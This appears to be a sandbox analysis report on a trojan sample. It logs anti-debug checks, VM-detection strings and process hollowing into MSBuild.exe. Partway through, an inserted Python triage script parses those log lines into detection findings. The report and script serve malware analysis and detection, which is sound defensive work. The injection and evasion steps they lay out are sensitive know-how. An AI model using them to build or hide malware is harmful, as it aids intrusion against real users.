Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60271
Source: unknown Network traffic detected: HTTP traffic on port 60245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60392
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60391
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60270
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60390
Source: unknown Network traffic detected: HTTP traffic on port 60463 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60337 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60268
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60389
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60267
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60388
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60387
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60386
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60385
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60263
Source: unknown Network traffic detected: HTTP traffic on port 60302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60262
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60383
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60261
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60382
Source: unknown Network traffic detected: HTTP traffic on port 60405 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60361 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60269
Source: unknown Network traffic detected: HTTP traffic on port 60275 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60502 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60313 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60282
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60281
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60280
Source: unknown Network traffic detected: HTTP traffic on port 60371 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60487 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60279
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60399
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60398
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60276
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60397
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60275
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60396
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60395
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60273
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60394
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60272
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60393
Source: unknown Network traffic detected: HTTP traffic on port 60406 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60439 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60326 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60383 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60417 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60440 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60293
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60292
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60291
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60290
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60289
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60288
Source: unknown Network traffic detected: HTTP traffic on port 60394 -> 443
Source: unknown HTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00582021 0_2_00582021
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058729C 0_2_0058729C
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059D39B 0_2_0059D39B
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059572C 0_2_0059572C
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_005D094F 0_2_005D094F
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058CAF2 0_2_0058CAF2
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059BB36 0_2_0059BB36
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00593C92 0_2_00593C92
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00581D79 0_2_00581D79
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058FEF0 0_2_0058FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: String function: 00587B80 appears 49 times
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7000 -s 272
Source: 5rVhexjLCx.exe, 00000000.00000000.1804354494.00000000005FC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameproquota.exej% vs 5rVhexjLCx.exe
Source: 5rVhexjLCx.exe Binary or memory string: OriginalFilenameproquota.exej% vs 5rVhexjLCx.exe
Source: 5rVhexjLCx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5rVhexjLCx.exe Static PE information: Section: .data ZLIB complexity 0.98996875
Source: classification engine Classification label: mal100.troj.evad.winEXE@6/5@0/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\INAM1FG6.htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7000
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a5fcf641-bfc1-4c7d-acee-a6a4cdc4e359
Source: 5rVhexjLCx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 5rVhexjLCx.exe ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\5rVhexjLCx.exe "C:\Users\user\Desktop\5rVhexjLCx.exe"
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7000 -s 272
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 5rVhexjLCx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 2_2_0041C03D
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_005871AD push ecx; ret 0_2_005871C0
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_005C7F0D push ecx; ret 0_2_005C7F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041B035 push ecx; ret 2_2_0041B048
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5rVhexjLCx.exe API coverage: 4.2 %
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00599ABF FindFirstFileExW, 0_2_00599ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00401160 GetSystemInfo, 2_2_00401160
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016C4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00587922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 2_2_004045C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 2_2_0041C03D
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00582003 mov edi, dword ptr fs:[00000030h] 0_2_00582003
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059A64C mov eax, dword ptr fs:[00000030h] 0_2_0059A64C
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_005C6628 mov eax, dword ptr fs:[00000030h] 0_2_005C6628
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00590F2E mov ecx, dword ptr fs:[00000030h] 0_2_00590F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00419750 mov eax, dword ptr fs:[00000030h] 2_2_00419750
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059CC4B GetProcessHeap, 0_2_0059CC4B
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00587610
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00587922
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0058DA73
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587AAF SetUnhandledExceptionFilter, 0_2_00587AAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041CEEA SetUnhandledExceptionFilter, 2_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041B33A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 5rVhexjLCx.exe PID: 7000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7072, type: MEMORYSTR
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1159008
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
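The behaviour lines above record three things an analyst has to separate: hypervisor strings (most of them from Amcache.hve.5.dr, which is a dropped copy of the analysis host's own Amcache hive and so describes the sandbox hardware rather than a check by the sample, while "VMwareVMware" in MSBuild.exe memory is the CPUID hypervisor vendor string the sample would see), anti-debug checks (the DebugPort query, fs:[30h] PEB reads, IsDebuggerPresent), and the PE injection chain into MSBuild.exe (an execute+write allocation at 400000, a write at that base beginning with 4D5A, further writes at section addresses, and MSBuild.exe spawned with an empty command line). The script below is an added triage example written for this page, not Joe Sandbox code or part of the report: it parses a constructed subset of the report's own lines and reconstructs those three findings. The line layout it assumes, the category names and the regexes are this example's own; the report's Sigma and Yara hits are separate signatures that it does not reproduce.

```python
import json
import re
from collections import defaultdict

# Constructed input: a subset of the report's behaviour lines with the
# "Jump to behavior" link text dropped. The layout assumed by EVENT_RE is
# this example's guess at the report format, not a documented schema.
SAMPLE_LINES = r"""
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059A64C mov eax, dword ptr fs:[00000030h] 0_2_0059A64C
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0058DA73
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
"""

EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?) (?P<event>Binary or memory string|Process queried|"
    r"Code function|Memory allocated|Memory written|Process created): (?P<detail>.*)$"
)
VM_MARKERS = ("vmware", "vmci", "hyper-v", "virtualbox", "vbox", "qemu", "kvm")


def parse(lines):
    """One dict per recognised report line; unrecognised lines are skipped."""
    return [m.groupdict() for m in map(EVENT_RE.match, lines) if m]


def classify_vm_strings(events):
    """Split hypervisor strings by origin. Amcache.hve.N.dr is the sandbox
    host's own hive (environment); a .sdmp is a process memory dump, so a
    string there can be attributed to the sample. "VMwareVMware" is the
    12-byte vendor string CPUID leaf 0x40000000 returns under VMware."""
    out = {"environment": [], "sample_memory": []}
    for e in events:
        if e["event"] != "Binary or memory string":
            continue
        if not any(k in e["detail"].lower() for k in VM_MARKERS):
            continue
        bucket = "environment" if e["src"].startswith("Amcache.hve") else "sample_memory"
        out[bucket].append(e["detail"])
    return out


def anti_debug_indicators(events):
    """Map the report's wording onto the underlying anti-debug technique."""
    found = set()
    for e in events:
        d = e["detail"]
        if e["event"] == "Process queried" and "DebugPort" in d:
            found.add("NtQueryInformationProcess(ProcessDebugPort)")
        elif e["event"] == "Code function":
            if "fs:[00000030h]" in d:  # fs:[30h] is the PEB on 32-bit Windows
                found.add("PEB read via fs:[30h]")
            if "IsDebuggerPresent" in d:
                found.add("IsDebuggerPresent")
    return sorted(found)


def reconstruct_injection(events):
    """Find PE injection chains per target process: an execute+write
    allocation, a write at that base starting with the MZ magic (4D5A),
    further writes above it (sections), and whether the target was spawned
    with an empty command line, as MSBuild.exe was in this report."""
    t = defaultdict(lambda: {"rwx": set(), "mz": set(), "writes": [], "no_args": False})
    for e in events:
        d = e["detail"]
        if e["event"] == "Memory allocated":
            m = re.match(r"(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$", d)
            if m and "execute" in m["prot"] and "write" in m["prot"]:
                t[m["target"]]["rwx"].add(int(m["base"], 16))
        elif e["event"] == "Memory written":
            m = re.match(r"(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)"
                         r"(?: value starts with: (?P<head>[0-9A-Fa-f]+))?$", d)
            if m:
                base = int(m["base"], 16)
                t[m["target"]]["writes"].append(base)
                if (m["head"] or "").upper().startswith("4D5A"):
                    t[m["target"]]["mz"].add(base)
        elif e["event"] == "Process created":
            m = re.match(r'(?P<target>.+?) (?P<cmdline>".*)$', d)
            if m and m["cmdline"].strip() == f'"{m["target"]}"':
                t[m["target"]]["no_args"] = True
    findings = []
    for target, info in t.items():
        for base in sorted(info["mz"] & info["rwx"]):
            findings.append({
                "target": target,
                "base": base,
                "section_writes": sum(1 for b in info["writes"] if b > base),
                "spawned_without_args": info["no_args"],
            })
    return findings


def triage(text=SAMPLE_LINES):
    events = parse(text.strip().splitlines())
    return {
        "vm_strings": classify_vm_strings(events),
        "anti_debug": anti_debug_indicators(events),
        "injection": reconstruct_injection(events),
    }


if __name__ == "__main__":
    print(json.dumps(triage(), indent=2))
```

Run stand-alone it prints the three buckets as JSON. The injection finding carries the MZ write base (0x400000, the default image base of a 32-bit PE, which the sandbox also unpacked as 2.2.MSBuild.exe.400000.0) and the count of section writes above it; paired with the report's "Creates a process in suspended mode" signature, that is the process hollowing pattern, and an empty MSBuild.exe command line under a non-build parent is what makes the LOLBin target stand out in process telemetry.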
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_0059C085
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW, 0_2_0059622B
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: EnumSystemLocalesW, 0_2_0059C372
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: EnumSystemLocalesW, 0_2_0059C327
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: EnumSystemLocalesW, 0_2_0059C40D
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0059C498
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW, 0_2_0059C6EB
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0059C814
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetLocaleInfoW, 0_2_0059C91A
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0059C9E9
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: EnumSystemLocalesW, 0_2_00595D7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00587815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00587815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00417850 GetUserNameA, 2_2_00417850
